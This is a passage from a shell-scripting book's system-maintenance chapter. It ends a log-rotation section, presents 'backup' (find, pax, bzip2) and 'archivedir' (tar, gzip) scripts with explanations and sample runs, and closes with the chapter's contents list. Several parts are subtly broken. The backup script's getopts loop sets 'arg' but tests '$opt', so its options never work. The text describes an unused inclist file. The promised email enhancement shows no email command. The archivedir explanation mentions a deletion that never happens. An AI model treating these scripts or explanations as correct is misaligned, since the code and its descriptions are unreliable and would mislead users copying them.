Listing 6-15: Running the rotatelogs again shows that no more logs need to be rotated.

Hacking the Script

One way to make this script even more useful is to have the oldest archive file, the old $back4 file, emailed or copied to a cloud storage site before it’s overwritten by the mv command. For the simple case of email, the script might just look like this:

echo "... $back3 -> $back4" ; $mv -f "$back3" "$back4"

Another useful enhancement to rotatelogs would be to compress all rotated logs to further save on disk space; this would require that the script recognize and work properly with compressed files as it proceeded.

#51 Managing Backups

Managing system backups is a task that all system administrators are familiar with, and it’s about as thankless as a job can be. No one ever says, “Hey, that backup’s working—nice job!” Even on a single-user Linux computer, some sort of backup schedule is essential. Unfortunately, it’s usually only after you’ve been burned once, losing both data and files, that you realize the value of a regular backup. One of the reasons so many Linux systems neglect backups is that many of the backup tools are crude and difficult to understand.

A shell script can solve this problem! The script in Listing 6-16 backs up a specified set of directories, either incrementally (that is, only those files that have changed since the last backup) or as a full backup (all files). The backup is compressed on the fly to minimize disk space used, and the script output can be directed to a file, a tape device, a remotely mounted NFS partition, a cloud backup service (like we set up later in the book), or even a DVD.

The Code

   #!/bin/bash

   # backup--Creates either a full or incremental backup of a set of defined
   #   directories on the system. By default, the output file is compressed and
   #   saved in /tmp with a timestamped filename. Otherwise, specify an output
   #   device (another disk, a removable storage device, or whatever else floats
   #   your boat).


   compress="bzip2"                 # Change to your favorite compression app.
    inclist="/tmp/backup.inclist.$(date +%d%m%y)"
     output="/tmp/backup.$(date +%d%m%y).bz2"
     tsfile="$HOME/.backup.timestamp"
      btype="incremental"           # Default to an incremental backup.
      noinc=0                       # And here's an update of the timestamp.

   trap "/bin/rm -f $inclist" EXIT

   usageQuit()
   {
     cat << "EOF" >&2
   Usage: $0 [-o output] [-i|-f] [-n]
     -o lets you specify an alternative backup file/device,
     -i is an incremental, -f is a full backup, and -n prevents
     updating the timestamp when an incremental backup is done.
   EOF
     exit 1
   }

   ########## Main code section begins here ###########

   while getopts "o:ifn" arg; do
     case "$opt" in
       o ) output="$OPTARG";       ;;   # getopts automatically manages OPTARG.
       i ) btype="incremental";    ;;
       f ) btype="full";           ;;
       n ) noinc=1;                ;;
       ? ) usageQuit               ;;
     esac
   done

   shift $(( $OPTIND - 1 ))

   echo "Doing $btype backup, saving output to $output"

   timestamp="$(date +'%m%d%I%M')"  # Grab month, day, hour, minute from date.
                                    # Curious about date formats? "man strftime"

   if [ "$btype" = "incremental" ] ; then
     if [ ! -f $tsfile ] ; then
       echo "Error: can't do an incremental backup: no timestamp file" >&2
       exit 1
     fi
     find $HOME -depth -type f -newer $tsfile -user ${USER:-LOGNAME} | \
➊   pax -w -x tar | $compress > $output
     failure="$?"
   else
     find $HOME -depth -type f -user ${USER:-LOGNAME} | \
➋   pax -w -x tar | $compress > $output
     failure="$?"
   fi

   if [ "$noinc" = "0" -a "$failure" = "0" ] ; then
     touch -t $timestamp $tsfile
   fi
   exit 0

Listing 6-16: The backup script

How It Works

For a full system backup, the pax command at ➊ and ➋ does all the work, piping its output to a compression program (bzip2 by default) and then to an output file or device. An incremental backup is a bit trickier, because the standard version of tar doesn’t include any sort of modification time test, unlike the GNU version of tar. The list of files modified since the previous backup is built with find and saved in the inclist temporary file. That file, emulating the tar output format for increased portability, is then fed to pax directly.

Choosing when to mark the timestamp for a backup is an area in which many backup programs get messed up, typically marking the “last backup time” as when the program has finished the backup, rather than when it started. Setting the timestamp to the time of backup completion can be a problem if any files are modified during the backup process, which becomes more likely as individual backups take longer to complete. Because files modified under this scenario would have a last-modified date older than the timestamp date, they would not be backed up the next time an incremental backup is run, which would be bad.

But hold on, because setting the timestamp to before the backup takes place is wrong too: if the backup fails for some reason, there’s no way to reverse the updated timestamp.

Both of these problems can be avoided by saving the date and time before the backup starts (in the timestamp variable) but waiting to apply the value of $timestamp to $tsfile using the -t flag to touch only after the backup has succeeded. Subtle, eh?

Running the Script

This script has a number of options, all of which can be ignored to perform the default incremental backup based on which files have been modified since the last time the script was run (that is, since the timestamp from the last incremental backup). Starting parameters allow you to specify a different output file or device (-o output), to choose a full backup (-f), to actively choose an incremental backup (-i) even though it is the default, or to prevent the timestamp file from being updated in the case of an incremental backup (-n).

The Results

The backup script requires no arguments and is simple to run, as Listing 6-17 details.

$ backup
Doing incremental backup, saving output to /tmp/backup.140703.bz2

Listing 6-17: Running the backup script requires no arguments and prints the results to screen.

As you would expect, the output of a backup program isn’t very scintillating. But the resulting compressed file is sufficiently large that it shows plenty of data is within, as you can see in Listing 6-18.

$ ls -l /tmp/backup*
-rw-r--r--  1 taylor  wheel  621739008 Jul 14 07:31 backup.140703.bz2

Listing 6-18: Displaying the backed-up file with ls

#52 Backing Up Directories

Related to the task of backing up entire filesystems is the user-centric task of taking a snapshot of a specific directory or directory tree. The simple script in Listing 6-19 allows users to create a compressed tar archive of a specified directory for archival or sharing purposes.

The Code

   #!/bin/bash

   # archivedir--Creates a compressed archive of the specified directory

   maxarchivedir=10           # Size, in blocks, of big directory.
   compress=gzip              # Change to your favorite compress app.
   progname=$(basename $0)    # Nicer output format for error messages.

   if [ $# -eq 0 ] ; then     # No args? That's a problem.
     echo "Usage: $progname directory" >&2
     exit 1
   fi

   if [ ! -d $1 ] ; then
     echo "${progname}: can't find directory $1 to archive." >&2
     exit 1
   fi

   if [ "$(basename $1)" != "$1" -o "$1" = "." ] ; then
     echo "${progname}: You must specify a subdirectory" >&2
     exit 1
   fi

➊ if [ ! -w . ] ; then
     echo "${progname}: cannot write archive file to current directory." >&2
     exit 1
   fi

   # Is the resultant archive going to be dangerously big? Let's check...

   dirsize="$(du -s $1 | awk '{print $1}')"

   if [ $dirsize -gt $maxarchivedir ] ; then
     /bin/echo -n "Warning: directory $1 is $dirsize blocks. Proceed? [n] "
     read answer
     answer="$(echo $answer | tr '[:upper:]' '[:lower:]' | cut -c1)"
     if [ "$answer" != "y" ] ; then
       echo "${progname}: archive of directory $1 canceled." >&2
       exit 0
     fi
   fi

   archivename="$1.tgz"

   if ➋tar cf - $1 | $compress > $archivename ; then
     echo "Directory $1 archived as $archivename"
   else
     echo "Warning: tar encountered errors archiving $1"
   fi

   exit 0

Listing 6-19: The archivedir script

How It Works

This script is almost all error-checking code, to ensure that it never causes a loss of data or creates an incorrect snapshot. In addition to using the typical tests to validate the presence and appropriateness of the starting argument, this script forces the user to be in the parent directory of the subdirectory to be compressed and archived, ensuring that the archive file is saved in the proper place upon completion. The test if [ ! -w . ] ➊ verifies that the user has write permission on the current directory. And this script even warns users before archiving if the resultant backup file would be unusually large.

Finally, the actual command that archives the specified directory is tar ➋. The return code of this command is tested to ensure that the script never deletes the directory if an error of any sort occurs.

Running the Script

This script should be invoked with the name of the desired directory to archive as its only argument. To ensure that the script doesn’t try to archive itself, it requires that a subdirectory of the current directory be specified as the argument, rather than ., as Listing 6-20 shows.

The Results

$ archivedir scripts
Warning: directory scripts is 2224 blocks. Proceed? [n] n
archivedir: archive of directory scripts canceled.

Listing 6-20: Running the archivedir script on the scripts directory, but canceling

This seemed as though it might be a big archive, so we hesitated to create it, but after thinking about it, we decided there’s no reason not to proceed after all.

$ archivedir scripts
Warning: directory scripts is 2224 blocks. Proceed? [n] y
Directory scripts archived as scripts.tgz

Here are the results:

$ ls -l scripts.tgz
-rw-r--r--  1 taylor  staff  325648 Jul 14 08:01 scripts.tgz

NOTE

Here’s a tip for developers: when actively working on a project, use archivedir in a cron job to automatically take a snapshot of your working code each night for archival purposes.

6SYSTEM ADMINISTRATION: SYSTEM MAINTENANCE

#45 Tracking Set User ID Applications

The Code

How It Works

Running the Script

The Results

#46 Setting the System Date

The Code

How It Works

Running the Script

The Results

#47 Killing Processes by Name

The Code

How It Works

Running the Script

The Results

Hacking the Script

#48 Validating User crontab Entries

The Code

How It Works

Running the Script

The Results

Hacking the Script

#49 Ensuring that System cron Jobs Are Run

The Code

How It Works

Running the Script

The Results

Hacking the Script

#50 Rotating Log Files

The Code

How It Works

Running the Script

The Results

Hacking the Script

#51 Managing Backups

The Code

How It Works

Running the Script

The Results

#52 Backing Up Directories

The Code

How It Works

Running the Script

The Results

6
SYSTEM ADMINISTRATION: SYSTEM MAINTENANCE